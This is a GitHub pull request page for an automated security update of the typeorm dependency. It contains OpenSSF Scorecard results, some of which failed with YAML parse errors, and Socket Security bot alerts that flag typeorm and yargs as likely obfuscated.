Token-Permissions⚠️ -1internal error: internal error: invalid GitHub workflow: :30:31: could not parse as YAML: mapping values are not allowed in this context [syntax-check]
Packaging⚠️ -1internal error: internal error: invalid GitHub workflow: :30:31: could not parse as YAML: mapping values are not allowed in this context [syntax-check]
Pinned-Dependencies⚠️ -1internal error: internal error: invalid GitHub workflow: :30:31: could not parse as YAML: mapping values are not allowed in this context [syntax-check]
Code-Review⚠️ 2Found 7/28 approved changesets -- score normalized to 2
Binary-Artifacts🟢 10no binaries found in the repo
Maintained🟢 1017 commit(s) and 11 issue activity found in the last 90 days -- score normalized to 10
Security-Policy⚠️ 0security policy file detected
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Signed-Releases⚠️ -1no releases found
Branch-Protection⚠️ -1internal error: error during branchesHandler.setup: internal error: some github tokens can't read classic branch protection rules: https://github.com/ossf/scorecard-action/blob/main/docs/authentication/fine-grained-auth-token.md
SAST⚠️ -1internal error: internal error: invalid GitHub workflow: :30:31: could not parse as YAML: mapping values are not allowed in this context [syntax-check]

Scanned Files

  • test-content/nest-project/package-lock.json

@socket-security

socket-security Bot commented Jun 23, 2026

Copy link
Copy Markdown

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff Package Supply Chain
Security
Vulnerability Quality Maintenance License
Updatedtypeorm@​0.3.28 ⏵ 0.3.3181 -16100 +3100 +198100

View full report

@socket-security

socket-security Bot commented Jun 23, 2026

Copy link
Copy Markdown

Warning

Review the following alerts detected in dependencies.

According to your organization's Security Policy, it is recommended to resolve "Warn" alerts. Learn more about Socket for GitHub.

Action Severity Alert  (click "▶" to expand/collapse)
Warn High
Obfuscated code: npm typeorm is 90.0% likely obfuscated

Confidence: 0.90

Location: Package overview

From: test-content/nest-project/package-lock.jsonnpm/typeorm@0.3.31

ℹ Read more on: This package | This alert | What is obfuscated code?

Next steps: Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support@socket.dev.

Suggestion: Packages should not obfuscate their code. Consider not using packages with obfuscated code.

Mark the package as acceptable risk. To ignore this alert only in this pull request, reply with the comment @SocketSecurity ignore npm/typeorm@0.3.31. You can also ignore all packages with @SocketSecurity ignore-all. To ignore an alert for all future pull requests, use Socket's Dashboard to change the triage state of this alert.

Warn High
Obfuscated code: npm typeorm is 90.0% likely obfuscated

Confidence: 0.90

Location: Package overview

From: test-content/nest-project/package-lock.jsonnpm/typeorm@0.3.31

ℹ Read more on: This package | This alert | What is obfuscated code?

Next steps: Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support@socket.dev.

Suggestion: Packages should not obfuscate their code. Consider not using packages with obfuscated code.

Mark the package as acceptable risk. To ignore this alert only in this pull request, reply with the comment @SocketSecurity ignore npm/typeorm@0.3.31. You can also ignore all packages with @SocketSecurity ignore-all. To ignore an alert for all future pull requests, use Socket's Dashboard to change the triage state of this alert.

Warn High
Obfuscated code: npm yargs is 90.0% likely obfuscated

Confidence: 0.90

Location: Package overview

From: test-content/nest-project/package-lock.jsonnpm/typeorm@0.3.31npm/yargs@17.7.3

ℹ Read more on: This package | This alert | What is obfuscated code?

Next steps: Take a moment to review the security alert above. Review the linked package source code to understand the potential risk. Ensure the package is not malicious before proceeding. If you're unsure how to proceed, reach out to your security team or ask the Socket team for help at support@socket.dev.

Suggestion: Packages should not obfuscate their code. Consider not using packages with obfuscated code.

Mark the package as acceptable risk. To ignore this alert only in this pull request, reply with the comment @SocketSecurity ignore npm/yargs@17.7.3. You can also ignore all packages with @SocketSecurity ignore-all. To ignore an alert for all future pull requests, use Socket's Dashboard to change the triage state of this alert.

View full report

@renovate
renovate Bot force-pushed the renovate/npm-typeorm-vulnerability branch from 711cc07 to 9617863 Compare July 12, 2026 11:12
@renovate
renovate Bot force-pushed the renovate/npm-typeorm-vulnerability branch from 9617863 to 0f6da08 Compare July 24, 2026 21:16
@renovate renovate Bot changed the title chore(deps): update dependency typeorm to v0.3.29 [security] chore(deps): update dependency typeorm to v0.3.31 [security] Jul 24, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants